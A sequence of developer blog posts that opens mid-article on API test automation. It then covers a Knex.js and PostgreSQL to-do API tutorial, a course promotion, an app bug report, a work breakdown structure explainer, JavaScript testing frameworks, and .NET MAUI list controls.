2. SoapUI: An open-source tool specifically designed for API testing, SoapUI supports functional, performance, and security testing for SOAP and REST APIs. Its user-friendly interface makes it accessible to both developers and testers.
3. RestAssured: A Java-based library for testing RESTful APIs, RestAssured simplifies the process of writing test scripts with its intuitive syntax and support for BDD.
4. JMeter: Primarily a performance testing tool, JMeter can also be used for functional API testing. It supports various protocols, making it suitable for different types of APIs.
5. Karate: An open-source framework that combines API testing and BDD, Karate allows for writing easy-to-understand test scripts using Gherkin syntax. It supports both HTTP and HTTPS protocols.
6. Newman: The command-line companion for Postman, Newman enables running Postman collections and scripts in CI/CD pipelines, facilitating automated testing and reporting.
7. Tavern: A Python-based API testing tool, Tavern is designed for validating RESTful APIs and MQTT-based APIs. It integrates well with Pytest, providing a robust testing environment.

## Challenges in API Test Automation

1. Complex Test Data Management: Managing and maintaining test data can be challenging, especially for complex APIs with multiple dependencies.
2. Handling Dynamic Responses: APIs often return dynamic data, making it difficult to validate responses accurately.
3. Maintaining Test Scripts: Keeping test scripts up-to-date with API changes requires constant effort and coordination with the development team.
4. Testing Third-Party APIs: Testing third-party APIs can be challenging due to limited control and documentation.
5. Ensuring Security and Privacy: Ensuring sensitive data is handled securely during testing is crucial to prevent data breaches and privacy violations.

## Conclusion

API test automation is a critical component of modern software development, ensuring the reliability, performance, and security of APIs. By adopting best practices, leveraging the right tools, and addressing challenges proactively, organizations can achieve efficient and effective API testing. As APIs continue to evolve and become more integral to software ecosystems, the importance of robust API test automation will only grow, making it an indispensable part of the development lifecycle.
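As a minimal illustration of the functional and data-driven testing ideas above, here is a sketch using only the Python standard library. The endpoint contract, field names, and canned payloads are hypothetical; in a real suite the responses would come from an HTTP client or from one of the tools listed above.

```python
# Sketch of data-driven functional API testing (stdlib only).
# The response payloads are canned here; a real suite would fetch them
# over HTTP with a client such as requests, or via Postman/Newman runs.
import json

# Hypothetical API contract: every /users response must carry these fields
REQUIRED_FIELDS = {"id", "name", "email"}

def validate_user_response(status_code, body):
    """Functional check: correct status code and all required fields present."""
    if status_code != 200:
        return False, f"unexpected status {status_code}"
    data = json.loads(body)
    missing = REQUIRED_FIELDS - data.keys()
    if missing:
        return False, f"missing fields: {sorted(missing)}"
    return True, "ok"

# Data-driven cases: (status, body, expected validity)
cases = [
    (200, '{"id": 1, "name": "Ada", "email": "ada@example.com"}', True),
    (200, '{"id": 2, "name": "Grace"}', False),  # missing email field
    (500, '{}', False),                          # server error
]

results = [validate_user_response(status, body)[0] for status, body, _ in cases]
print(results)  # [True, False, False]
```

The same validator can be reused across many payloads, which is the essence of the data-driven approach: the test logic stays fixed while the case table grows.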
keploy
1,909,063
How to Create a Node API With Knex and PostgreSQL
Creating a strong and well-structured backend is very important to aiding database management systems...
0
2024-07-02T15:15:37
https://dev.to/mmili_01/how-to-create-a-node-api-with-knex-and-postgresql-4329
Creating a strong, well-structured backend is essential for managing databases effectively. As a developer, writing raw SQL queries and manually handling database migrations and transactions can be tedious and error-prone. Knex.js helps you easily create complex queries to select, insert, update, and delete data from a database.

In this article, you will learn how to set up a development environment for using PostgreSQL, configure Knex with PostgreSQL, and build a RESTful API using Node.js, Knex, and PostgreSQL. By the end of this article, you will have built a to-do list API that puts what you learn into practice.

## Overview of Knex

[Knex.js](https://knexjs.org/) is a versatile SQL query builder primarily used with Node.js. It is designed for flexibility, portability, and ease of use across various databases, such as PostgreSQL, CockroachDB, MSSQL, MySQL, MariaDB, SQLite3, Better-SQLite3, Oracle, and Amazon Redshift. [PostgreSQL](https://www.postgresql.org/) is a popular relational database system widely used in modern web applications and other software systems.

## Setting up your Development Environment

Installing PostgreSQL is necessary if you want to use it for development. Navigate to the [PostgreSQL website](https://www.postgresql.org/download/) and select your operating system to download PostgreSQL. Alternatively, you can use PostgreSQL in the cloud with platforms like [Neon.tech](http://Neon.tech) and [ElephantSQL](https://www.elephantsql.com/), both of which offer PostgreSQL as a service.
After setting up PostgreSQL on your machine, create a folder for the todo project by running the following command:

```bash
mkdir knex-todo-tutorial
```

Next, navigate into the project directory using `cd`:

```bash
cd knex-todo-tutorial
```

While in the project directory, run the following command to initialise npm in your project directory:

```bash
npm init -y
```

The `-y` flag initialises `npm` with all the default parameters.

To use Knex with PostgreSQL, you need to install some dependencies. Run the following commands to install them in your project:

```bash
npm install knex pg express dotenv
npm install -g knex
```

Note that `knex` is installed both locally and globally: the local copy is what your code `require`s, while the global copy provides the `knex` command-line tool used later for `knex init` and migrations (alternatively, you can run the CLI with `npx knex` instead of installing it globally).

Next, create a `.env` file in your project’s root directory and store your database credentials:

```bash
# URI
DATABASE_URI = YOUR_DATABASE_URI

# credentials
DATABASE_NAME = YOUR_DATABASE_NAME
DATABASE_PASSWORD = YOUR_DATABASE_PASSWORD
```

Replace the placeholders in the snippet above with the actual values.

## Setting up your Express Server

In this tutorial, we will use a simple to-do list API to demonstrate how to use Knex together with PostgreSQL in a Node.js application. First, create an `index.js` file in your project’s root directory and add this code to it:

```jsx
const express = require("express");
const app = express();
const port = 3000;

app.use(express.json());

app.listen(port, () => {
  console.log(`App listening on port:${port}`);
});
```

The code block above initialises your Express server and listens on port 3000. It uses the `express.json()` middleware to parse incoming JSON requests.

## Configuring Knex with PostgreSQL

To use Knex in your application, you first have to initialise it and configure it with the database driver you wish to use. In this case, we are using PostgreSQL.
Run the following command to initialise Knex in your application:

```bash
knex init
```

The command above creates a `knexfile.js`, which contains configuration settings for connecting to your database, such as the database type, host, port, username, password, and other options. You then have to configure it based on your development environment.

The generated `knexfile.js` will have `sqlite3` as its development database by default. To use PostgreSQL, replace your current `knexfile.js` with the code block below:

```jsx
// Update with your config settings.
require("dotenv").config();

/**
 * @type { Object.<string, import("knex").Knex.Config> }
 */
module.exports = {
  development: {
    client: "pg",
    connection: process.env.DATABASE_URI,
    migrations: {
      directory: "./db/migrations",
    },
  },
};
```

The code block above configures Knex to use PostgreSQL as its database client. It also specifies the database connection with environment variables and the file path where your migration files will be stored.

Next, create a `db` folder in your project directory by running the command below:

```bash
mkdir db
```

Create a `db.js` file in your `db` folder and import `knex` and your `knexfile.js` file in this manner:

```jsx
const knex = require("knex");
const knexFile = require("../knexfile.js");
```

Next, set up your `environment` variable using the code block below:

```jsx
//db/db.js
const environment = process.env.NODE_ENV || "development";

module.exports = knex(knexFile[environment]);
```

The code block above sets your `environment` variable to either `NODE_ENV` or `"development"`. This lets you specify different configurations for different environments, such as development, production, or testing. The `module.exports` statement exports a configured Knex.js instance using the configuration settings from `knexFile[environment]`. This instance can create database tables, insert data, run queries, and perform other database-related operations in JavaScript code.
## Creating Migration Files

Migration files are scripts you can use to manage changes to a database schema, such as adding new tables, modifying existing ones, or adjusting column types, without losing data or disrupting ongoing operations. They can also be used to automate the transfer of data from one database to another.

Altering the schema of a database can be complex and error-prone. By using migration files, you define the changes you want to make in a migration file instead of manually modifying the database schema. When you run the migration file using Knex, it automatically applies the changes to the database schema, ensuring that they are made consistently and correctly.

To create a migration file, run the command below:

```bash
knex migrate:make todo
```

The command above creates a "todo" migration file in the path specified in `knexfile.js` (`db/migrations`). Note that you can replace the "todo" argument with your preferred migration name.

Next, open your migration file and replace the `up` function with the code block below:

```jsx
exports.up = function (knex) {
  //Create a table called "todo" with the following columns: id, title, content, created_at, updated_at
  return knex.schema.createTable("todo", (table) => {
    table.increments("id").primary(); //id column with auto-incrementing primary key
    table.string("title").notNullable(); //title column with type string
    table.text("content").notNullable(); //content column with type text
    table.timestamps(true, true); //created_at and updated_at columns with type timestamp
  });
};
```

The code block above, when executed, creates a `todo` table in your PostgreSQL database with the columns specified above.
Next, replace the `down` function with the code block below:

```jsx
exports.down = function (knex) {
  // Drop the "todo" table if it exists
  return knex.schema.dropTableIfExists("todo");
};
```

The `todo` table in your PostgreSQL database is dropped when the code block above is executed. This is the opposite of what the `up` function does.

Run the command below in your terminal to run your migrations:

```bash
knex migrate:latest
```

The command above goes through all your migration files and runs the `up` function.

To undo the migrations, run the command below:

```bash
knex migrate:rollback
```

The command above goes through all your migration files and runs the `down` function.

## Creating CRUD Endpoints

Create a `routes` folder in the root directory of your project and a `todo.js` file inside it for better code organisation. In your `todo.js` file, import Express and your Knex configuration, and set up the Express Router:

```jsx
const express = require("express");
const db = require("../db/db.js");

const router = express.Router();
```

In your `todo.js` file, you can now add CRUD endpoints to interact with your database. The tutorial will feature queries that get all the tasks, get a task based on a condition, add a task, update a task, and delete a task from the database.

### Getting All Tasks

To get all the tasks on your to-do list from your database, add the code block below to your `todo.js` file:

```jsx
router.get("/todo", async (req, res) => {
  try {
    const tasks = await db.select("*").from("todo");
    res.send({ msg: tasks });
  } catch (error) {
    res.status(500).json({ error: error.message });
  }
});
```

The code block above returns all the tasks in your database.
### Getting Tasks Conditionally

To get tasks from your database based on certain conditions, use the code block below:

```jsx
router.get("/todo/:id", async (req, res) => {
  const { id } = req.params;
  try {
    const task = await db("todo").where({ id });
    if (task.length !== 0) {
      res.send({ msg: task });
    } else {
      res.status(404).json({ msg: "task not found" });
    }
  } catch (error) {
    res.status(500).json({ error: error.message });
  }
});
```

The code block above returns the task matching the given `id`.

### Adding a New Task to your Database

To add a new task to your database, use the code block below:

```jsx
router.post("/todo", async (req, res) => {
  const { title, content } = req.body;
  try {
    const task = await db("todo").insert({ title, content });
    res.status(201).send(task);
  } catch (error) {
    res.status(500).json({ error: error.message });
  }
});
```

The code block above adds a new task to your database.

### Updating an Existing Task

To update an existing task in the database, use the code block below:

```jsx
router.put("/todo/:id", async (req, res) => {
  const { id } = req.params;
  const { title, content } = req.body;
  try {
    const task = await db("todo")
      .where({ id })
      .update({ title, content }, ["id", "title", "content"]);
    if (task.length !== 0) {
      res.status(201).send(task);
    } else {
      res.status(404).json({ error: "task not found" });
    }
  } catch (error) {
    res.status(500).json({ error: error.message });
  }
});
```

The code block above updates an existing task based on a given `id`.

### Deleting a Task

To delete a task from the database, use the code block below:

```jsx
router.delete("/todo/:id", async (req, res) => {
  const { id } = req.params;
  try {
    const task = await db("todo").where({ id }).del();
    if (task) {
      res.status(204).send();
    } else {
      res.status(404).json({ error: "Task not found" });
    }
  } catch (error) {
    res.status(500).json({ error: error.message });
  }
});
```

The code block above deletes a task from your database.
Finally, export your router by adding the line of code below to your `todo.js` file:

```jsx
module.exports = router;
```

## Testing Your Application

Navigate to your `index.js` file, import your router, and add it as middleware:

```jsx
//index.js
const todoRouter = require("./routes/todo.js");

app.use(todoRouter);
```

Then, start up your application by running the command below:

```bash
node index.js
```

To test your application, you can use tools such as [Postman](https://www.postman.com/) to make HTTP requests to your API and verify that it returns the expected results.

## Conclusion

In this article, you learned how to use Knex.js with PostgreSQL to build a Node.js API. You also learned how to configure Knex to use PostgreSQL as its database client, connect to a PostgreSQL database locally and remotely, and make queries using Knex. With the knowledge gained in this article, you can now build strong and reliable Node.js applications that leverage the power of PostgreSQL and the simplicity of Knex.js.
*Author: mmili_01*

---

# Discover the Fascinating World of Computation and Logic with Inf1 from the University of Edinburgh 🧠

> Explore the fundamentals of computation and logic with this comprehensive course from the University of Edinburgh. Access weekly schedules, previous materials, and a birds-eye overview of the subject matter.

*Published 2024-07-02 · https://getvm.io/tutorials/inf1-computation-and-logic-2015-university-of-edinburgh*
*Tags: getvm, programming, freetutorial, universitycourses*
Are you curious about the fundamental principles of computation and logic? Look no further than the Inf1 - Computation and Logic course offered by the prestigious University of Edinburgh! 🏫

## Course Overview

This comprehensive course will take you on a captivating journey through the core concepts of computation and logic. Developed by a team of renowned experts, the course provides a birds-eye view of the subject matter, covering weekly schedules, previous materials, and a wealth of engaging content.

## What You'll Learn 🤓

Throughout the course, you'll explore the fascinating interplay between computation and logic, delving into topics such as:

- Fundamental principles of computation
- The intricacies of logical reasoning
- The role of algorithms in problem-solving
- The relationship between data, information, and knowledge

## Why You Should Enroll 💡

Whether you're a student looking to expand your knowledge or a lifelong learner with a passion for technology, this course is a must-try. With its user-friendly format and convenient access to course materials, you can easily fit it into your schedule and embark on an enriching educational journey.

## Get Started Today! 🚀

Don't miss out on this incredible opportunity to unlock the secrets of computation and logic. Visit the course website at [http://www.inf.ed.ac.uk/teaching/courses/inf1/cl/](http://www.inf.ed.ac.uk/teaching/courses/inf1/cl/) and get ready to dive into a world of intellectual stimulation and personal growth. Let's embark on this exciting adventure together! 🎉

## Enhance Your Learning with GetVM's Playground 🚀

To truly unlock the full potential of the Inf1 - Computation and Logic course from the University of Edinburgh, I highly recommend using the GetVM Playground. This powerful browser extension provides an immersive online coding environment, allowing you to seamlessly apply the concepts you learn and experiment with hands-on exercises.

With the GetVM Playground, you can access the course materials directly from [https://getvm.io/tutorials/inf1-computation-and-logic-2015-university-of-edinburgh](https://getvm.io/tutorials/inf1-computation-and-logic-2015-university-of-edinburgh) and dive into interactive coding challenges. This interactive approach not only reinforces your understanding but also helps you develop practical skills that you can apply in real-world scenarios.

The Playground's intuitive interface and instant feedback make it an invaluable tool for learning. You can experiment with different algorithms, test your logical reasoning, and receive immediate guidance to ensure you're on the right track. This seamless integration of theory and practice will accelerate your learning and equip you with the skills to excel in the field of computation and logic.

So, why wait? Start your journey with the Inf1 - Computation and Logic course and enhance your learning experience with the powerful GetVM Playground. Unlock your full potential and become a master of computation and logic! 🧠💻

---

## Practice Now!

- 🔗 Visit [Inf1 - Computation and Logic | University of Edinburgh](http://www.inf.ed.ac.uk/teaching/courses/inf1/cl/) original website
- 🚀 Practice [Inf1 - Computation and Logic | University of Edinburgh](https://getvm.io/tutorials/inf1-computation-and-logic-2015-university-of-edinburgh) on GetVM
- 📖 Explore More [Free Resources on GetVM](https://getvm.io/explore)

Join our [Discord](https://discord.gg/XxKAAFWVNu) or tweet us [@GetVM](https://x.com/getvmio)! 😄
*Author: getvm*

---

# Bug Report for SAW

*Published 2024-07-02 · https://dev.to/abdielbytes/bug-report-for-saw-3hf9*
**Date:** 01/07/2024

**Summary:** The application has multiple issues affecting its usability, particularly with the URL management functionalities. Various buttons and features do not perform as expected, and some operations cause the application to crash or behave unpredictably.

**Detailed Description of Issues:**

**UI Issue: "Add URL" Button Covers Text on Startup**

- Severity: Medium
- Description: Upon opening the application, the "Add URL" button overlaps with text on the screen, obstructing readability.
- Steps to Reproduce:
  1. Open the application.
  2. Observe the "Add URL" button's position relative to on-screen text.

**"Add URL" Button Non-Functional**

- Severity: High
- Description: The "Add URL" button does not function when clicked.
- Steps to Reproduce:
  1. Click the "Add URL" button.
  2. No action is taken by the application.

**"URL Must Contain" Text on Sidebar Not Functional**

- Severity: Medium
- Description: The feature indicating that the URL must contain specific text on the sidebar does not work as intended.
- Steps to Reproduce:
  1. Add a URL.
  2. Check if the URL is validated against the specified text.

**Inconsistent Performance: "Add URLs from File"**

- Severity: High
- Description: Adding URLs from a file does not work reliably; sometimes, the app needs to be restarted to function correctly.
- Steps to Reproduce:
  1. Attempt to add URLs from a file.
  2. Observe if the operation succeeds without requiring a restart.

**False Link Detection in DOCX Files**

- Severity: Medium
- Description: The application detects links in DOCX files that do not contain any links. It is unclear if this is intentional.
- Steps to Reproduce:
  1. Add a DOCX file with no links.
  2. Check if the app identifies any links.

**Loss of Scraped Links on Restart**

- Severity: High
- Description: When the app is restarted, it only retains scraped links, and un-scraped links are lost.
- Steps to Reproduce:
  1. Scrape links in the app.
  2. Restart the app.
  3. Observe that only scraped links are present.

**App Crash When Adding DOCX File with URLs**

- Severity: Critical
- Description: The application closes unexpectedly when a DOCX file containing URLs is added.
- Steps to Reproduce:
  1. Add a DOCX file containing URLs.
  2. Observe if the app crashes.

**Incorrect URL Display After Restart**

- Severity: High
- Description: After restarting the app, it displays random URLs associated with a file instead of the correct URLs.
- Steps to Reproduce:
  1. Add a file with URLs.
  2. Restart the app.
  3. Check the URLs displayed.

**Scraping Functionality Without Internet**

- Severity: Medium
- Description: The application continues to scrape URLs even when there is no internet connection, which is unexpected behavior.
- Steps to Reproduce:
  1. Disconnect from the internet.
  2. Attempt to scrape URLs.
  3. Observe if the app continues to scrape.

**Environment:**

- App Version:
- Operating System: Windows 10

**Additional Comments:** It is crucial to address these issues to improve the application's reliability and user experience. Please feel free to contact me for any further information or clarification.
*Author: abdielbytes*

---

# Work Breakdown Structure (WBS)

*Published 2024-07-02 · https://dev.to/abedin022/work-breakdown-structure-wbs-1n1g*
*Tags: programming, projectmanagement, softwareengineering, workbreakdownstructure*
As a part of my course on Software Project Management, I learned about this new thing: Work Breakdown Structure (WBS). After doing an ample amount of research on this topic, I decided to write an article explaining WBS in the simplest terms.

### What is WBS?

Every complex thing has to be broken down into smaller parts to be efficiently accomplished; software projects are no different in this regard. When you have a complex project and want to ensure it is managed and completed properly, maintaining the highest possible standards, you break it down into smaller tasks. The broken-down structure is precisely what is known as a WBS.

![A Sample WBS](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/h8f7d97np0vnhmu5gqqn.jpg)

### Types of WBS

Primarily, there are two types of WBS:

1. Deliverable-Based WBS
2. Phase-Based WBS

#### Deliverable-Based WBS

In this WBS, the work is first broken down into small deliverable units which are meant to be completed one after another. Each of the deliverable units is then broken down into sub-units for better understanding and easier accomplishment.

![A Deliverable-Based WBS](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/higtb28qtvhc2h104aiu.jpg)

#### Phase-Based WBS

In this category of WBS, instead of deliverables, the work is broken down into phases; each phase consists of a whole range of activities to be completed. A phase generally starts after the previous phase ends.

![A Phase-Based WBS](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3m0do70yclshhuywvs49.jpg)

### Key points about a WBS

Here are some key points that should be taken care of to design a proper and clearly understandable WBS.

#### Control Account

A control account is a checkpoint that helps us monitor and manage the project's budget and resources effectively. It also helps us measure the performance of the project. Benefits of a WBS include early detection of problems, providing a clear picture of resource consumption, and many more.

#### Planning Package

A planning package represents a higher-level task that needs to be broken down into smaller units to be accomplished. These are often used to estimate and allocate resources for specific segments of the project. In other words, planning packages often serve as control accounts.

#### Work Package

A work package is the smallest, leaf-level unit of a WBS because the work generally cannot be broken down further. It's a collection of related tasks to achieve a specific outcome in a project. For a better understanding, have a look at this diagram.

![Control Account, Planning Package & Work Package](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ksioytqmlxcxn8yg2jht.png)

#### Gantt Chart

A Gantt chart is a specific type of chart in project management that is used to describe the project schedule. It describes the sequence in which the project tasks have to be completed. Each Gantt chart has two parts: a list of tasks on the left and a timeline on the right.

![Gantt Chart](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fo1sruvswfmt5n8vcrw1.jpg)

These are mostly the basic concepts related to WBS. A deeper study of project management will introduce more concepts, but these primary ones lay the foundation of a complete WBS and help deliver the project plan and timeline properly to the stakeholders. Feel free to share your thoughts, and do more research on WBS and project management to get a deeper understanding.
*Author: abedin022*

---

# Boost Your Testing Game

*Published 2024-07-02 · https://dev.to/gadekar_sachin/boost-your-testing-game-344c*
### JavaScript Testing Frameworks

1. **Jest**
   - **Summary**: A comprehensive testing framework developed by Facebook. It's widely used for testing JavaScript applications, particularly those built with React.
   - **Features**: Built-in test runners, coverage reports, snapshot testing, and mock functions.

2. **Mocha**
   - **Summary**: A flexible testing framework for Node.js, known for its simplicity and extensive configuration options.
   - **Features**: Asynchronous testing, customizable reporting, and integration with various assertion libraries like Chai.

3. **Cypress**
   - **Summary**: An end-to-end testing framework for web applications, designed to be fast, reliable, and easy to use.
   - **Features**: Real-time reloads, time-travel debugging, and a powerful dashboard for test results.

4. **Jasmine**
   - **Summary**: A behavior-driven development (BDD) framework for testing JavaScript code.
   - **Features**: Easy syntax, no need for external libraries, built-in assertions, and support for asynchronous testing.

5. **Karma**
   - **Summary**: A test runner developed by the AngularJS team, primarily for unit testing in JavaScript.
   - **Features**: Supports multiple browsers, real-time testing, and integration with various continuous integration (CI) tools.

6. **QUnit**
   - **Summary**: A powerful, easy-to-use JavaScript unit testing framework, particularly useful for testing jQuery projects.
   - **Features**: Built-in assertions, test organization, and support for asynchronous testing.

7. **Ava**
   - **Summary**: A minimalistic test runner for JavaScript, known for its simplicity and parallel test execution.
   - **Features**: Parallel test execution, concise API, and support for ES6/ES7 features.

8. **Enzyme**
   - **Summary**: A JavaScript testing utility for React, developed by Airbnb, allowing for easier manipulation and traversal of React components.
   - **Features**: Shallow rendering, full DOM rendering, and static rendering.

These frameworks cater to different needs, from unit testing and integration testing to end-to-end testing, and they offer a range of features to support efficient and effective test automation in JavaScript projects.
*Author: gadekar_sachin*

---

# All the Lists in .NET MAUI

*Published 2024-07-02 · https://dev.to/davidortinau/all-the-lists-in-net-maui-33bd*
*Tags: dotnet, dotnetmaui, mobile, mauiuijuly*
> This blog is part of the [.NET MAUI UI July 2024](https://goforgoldman.com/posts/mauiuijuly-24/) series with a new post every day of the month. See the [full schedule](https://goforgoldman.com/posts/mauiuijuly-24/#net-maui-ui-july-schedule) for more.

In any app project, you will inevitably have a list of things to display and be faced with choosing the best control to use. Here I will muse on how I have approached these decisions, focusing on mobile applications. I surveyed the apps on my phone and snagged a cross-section of different experiences. For the data, I wrote a `MockDataService` to generate useful yet random content. For images, I used a combination of [Lorem Picsum](https://picsum.photos) and images I crafted with [ChatGPT](https://chatgpt.com/). I think the results are pretty nice, although I warn they are not production polished and feature complete.

![feature image of various layouts](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ldmf1q2wg5gwasqlieua.png)

Jump to each of the samples below:

* [Basic list](#layout-1-basic-list) - even rows
* [Reviews](#layout-2-reviews-uneven-rows) - uneven rows
* [Social check-in](#layout-3-social-check-in-uneven-rows-complex-layout) - complex layout
* [Learning course](#layout-4-learning-course-expand-and-contract) - expanding rows
* [Who's Watching](#layout-5-whos-watching-flex-layout) - flex layout
* [Mailboxes](#layout-6-mailboxes-expand-and-contract) - expanding rows
* [Contacts](#layout-7-contacts-grouping-search) - grouping and search
* [Shopping](#layout-8-shopping-header-data-template-selector-infinite-scroll) - header, multiple data templates, infinite scroll

{% embed https://github.com/davidortinau/AllTheLists %}

Before I get into each sample, I want to get out of the way some general thoughts.

**Anything that does everything does nothing well.** In order for a generalized control to be flexible enough to meet a wide variety of needs, compromises will be made in its implementation. This may lead you to be frustrated when it doesn't meet your expectations. A specialized control that only does what you need will best meet the need of that scenario. The other side of that sharp edge is your knowledge and skill also need to level up from general to specialized.

**Flat is faster than fat.** It's true. If speed is important to your scenario, then a layout that avoids a lot of UI and nesting of controls will perform better at scale because it requires fewer measure and layout calls. Avoid measuring at all costs when performance is critical; give your UI explicit size anytime you can.

**UX > UI.** I see a lot of apps struggling with list scenarios because they jam a ton of UI into them to get the job done, rather than leaning on good UX principles. Do you really need a whole chat experience in every row of the list, or could you navigate to another page? Perhaps you could use a modal experience or a bottom sheet? Anytime your mobile UI has more than one clear call to action, you're in danger of the UI being less efficient instead of more efficient for your user. Solve problems with UX before UI.

## Overview of .NET MAUI List Controls

In my sample, I've used three built-in controls and two community controls that all demonstrate different approaches with strengths and weaknesses. .NET MAUI provides `CollectionView`, `ListView`, and `BindableLayout`. From the community, I chose [`VirtualListView`](https://www.nuget.org/packages/Redth.Maui.VirtualListView) and [`VirtualizeListView`](https://www.nuget.org/packages/MPowerKit.VirtualizeListView). There are many other options, a few of which I list at the end for you to evaluate yourself.
| | CollectionView | ListView | BindableLayout | VirtualListView | VirtualizeListView |
|---------------|----------------|----------|----------------|---------------|-------------------|
| **Virtualized** | Yes | Yes | No | Yes | Yes |
| **Pull-to-Refresh** | Yes - with RefreshView | Yes | Yes - with RefreshView | Yes | Yes |
| **Single Selection** | Yes | Yes | No | Yes | Yes |
| **Multiple Selection** | Yes | No | No | Yes | No |
| **Load More (Threshold)** | Yes | No | No | No | Yes |
| **Layout - Vertical** | Yes | Yes | Yes | Yes | Yes |
| **Layout - Horizontal** | Yes | No | Yes | | Yes |
| **Layout - Grid** | Yes | No | Yes | No | No |
| **Layout - Custom** | Yes | No | Yes | No | No |
| **Behavior** | Platform specific | Platform specific | Cross-platform | Platform specific | Cross-platform |
| **Grouped Data** | Yes | Yes | No | Yes | Yes |
| **Context Menu Items** | Yes - with SwipeView | Yes | Yes - with SwipeView | No | No |
| **Header / Footer** | Yes | Yes | No | Yes | Yes |
| **Predefined Templates** | No | Yes | No | No | No |
| **Empty View Template** | Yes | No | Yes - with Community Toolkit | Yes | No |

I will mostly focus on `CollectionView` over `ListView` unless there is a compelling reason to prefer the latter.

### Additional Performance Notes

If the speed of rendering and scroll is of utmost importance for your scenario, then these notes are for you.

* **Layout Lifecycle** - understanding the [layout measure and arrange process](https://learn.microsoft.com/dotnet/maui/user-interface/layouts/custom?view=net-maui-8.0#layout-process) is essential when you're trying to diagnose and improve the rendering performance of a complex UI. In general, if you know the size of something, then provide it.
* **Compiled Bindings** will improve the rendering and updating of your XAML data-bound controls by telling the compiler the type that is being used. On any enclosing XAML element with a BindingContext, specify the type with, for example, `x:DataType="model:Sample"`.
* **Binding Modes** - the default binding mode for bindable properties differs from control to control, and property to property. Most are `OneWay`, such as `View.Rotation` or `View.Scale`, while properties often used to capture user input are `TwoWay`, such as `Entry.Text` and `ListView.IsRefreshing`. In most cases, the default will be what you expect and need, but keep in mind you can change these and have other options such as `OneTime` and `OneWayToSource`. [Documentation](https://learn.microsoft.com/dotnet/maui/fundamentals/data-binding/binding-mode?view=net-maui-8.0)
* **ObservableCollection vs List** - if your data won't be updating dynamically, and perhaps it's a `OneTime` binding, then use `List`.
* **Images** - make sure your images are appropriately sized for their use on screen. Scaling down images at runtime can be a massive demand on resources, quickly sending you into memory and crash issues. Raster images render faster than vector images in almost every situation. AND if you're loading images from a remote source, be sure you're not blocking the UI loading them. Use a control like FFImage to show a placeholder image and lazy load the remote image. Also, be aware you can customize the [image caching policy](https://learn.microsoft.com/dotnet/maui/user-interface/controls/image?view=net-maui-8.0#image-caching) in .NET MAUI.
* **Release vs Debug** - when evaluating performance, you must be using a release build. There are just so many things going on in a debug build that slow the app down that it's not at all useful to judge. Produce a release build and measure that. And know your options for AOT (Ahead of Time) compilation. .NET 9 has a preview Native AOT for iOS; however, it's extremely strict, and most libraries are not compatible. We did a lot of work in .NET MAUI itself to make it compatible. Android has partial (startup tracing) and full AOT to choose from.
* **Test on Device** - be sure to review release builds on the device. If you know the target device and OS version of your users, then ideally test on that. I've used my iPhone 15 Pro and a Pixel 5. In 99.9999% of cases, iOS isn't going to be where you see performance concerns.
* **Layout compression (obsolete)** was a run-time optimization in Xamarin.Forms that would remove wrapping layouts from the visual tree. If the layout had no background color and received no user input via gestures, then it could safely be eliminated from the actual UI rendered to the screen. This was useful in Xamarin.Forms, where nearly all views (renderers) were wrapped in views. Later in Xamarin.Forms, a set of updated renderers was introduced, aptly named "fast renderers", which removed those wrapping views. In .NET MAUI, this redundancy was eliminated, and **Layout Compression** was not implemented. The API remains, but should be deprecated, and you should treat it so.

## Layout 1: Basic List

{% embed https://youtu.be/WiZ8RKor86w %}

This is the most simple and common use of a list, so there's not much to say about it. All the rows are exactly the same height and layout. For this need, you cannot go wrong between the virtualized controls. They all perform this scenario very well, even when displaying 10,000 rows.

```xml
<CollectionView ItemsSource="{Binding Products}">
    <CollectionView.ItemTemplate>
        <DataTemplate>
            <v:ProductListItem />
        </DataTemplate>
    </CollectionView.ItemTemplate>
</CollectionView>
```

```xml
<ListView ItemsSource="{Binding Products}">
    <ListView.ItemTemplate>
        <DataTemplate>
            <ViewCell>
                <v:ProductListItem />
            </ViewCell>
        </DataTemplate>
    </ListView.ItemTemplate>
</ListView>
```

You may be wondering why I'm not binding anything above to the `ProductListItem`. `BindingContext` automatically propagates in this (and most) cases to the children. Here the provided `BindingContext` is the single `Product`.
```xml
<?xml version="1.0" encoding="utf-8" ?>
<ContentView xmlns="http://schemas.microsoft.com/dotnet/2021/maui"
             xmlns:x="http://schemas.microsoft.com/winfx/2009/xaml"
             xmlns:ffimageloading="clr-namespace:FFImageLoading.Maui;assembly=FFImageLoading.Maui"
             xmlns:m="clr-namespace:AllTheLists.Models"
             xmlns:vm="clr-namespace:AllTheLists.ViewModels"
             x:DataType="m:Product"
             x:Class="AllTheLists.Views.ProductListItem">
    <Grid Padding="16" ColumnDefinitions="80,*,40" ColumnSpacing="16">
        <ffimageloading:CachedImage Source="{Binding ImageUrl}"
                                    HeightRequest="80"
                                    WidthRequest="80"
                                    LoadingPlaceholder="https://via.placeholder.com/80"
                                    ErrorPlaceholder="error.png">
        </ffimageloading:CachedImage>
        <VerticalStackLayout Grid.Column="1" Padding="10">
            <Label Text="{Binding Name}" FontSize="16" />
            <Label Text="{Binding Price, StringFormat='Price: {0:C}'}" FontSize="14" />
            <Label Text="{Binding Description}" FontSize="12" LineBreakMode="TailTruncation" />
        </VerticalStackLayout>
        <CheckBox Grid.Column="2" VerticalOptions="Center" />
    </Grid>
</ContentView>
```

In addition to samples for `ListView` and `CollectionView`, I checked out `VirtualListView` by Redth and `VirtualizeListView` by MPowerKit. The latter is a completely cross-platform virtualized control, which is an interesting approach. If consistency across platforms is your goal, then that might be a great option for you.
References:

* [CollectionView](https://learn.microsoft.com/dotnet/maui/user-interface/controls/collectionview/?view=net-maui-8.0)
* [FFImageLoading.Maui](https://www.nuget.org/packages/FFImageLoading.Maui)
* [ListView](https://learn.microsoft.com/dotnet/maui/user-interface/controls/listview?view=net-maui-8.0)
* [VirtualListView](https://www.nuget.org/packages/Redth.Maui.VirtualListView)
* [VirtualizeListView](https://www.nuget.org/packages/MPowerKit.VirtualizeListView)

## Layout 2: Reviews [Uneven rows]

{% embed https://youtu.be/hE5P-KPii0k %}

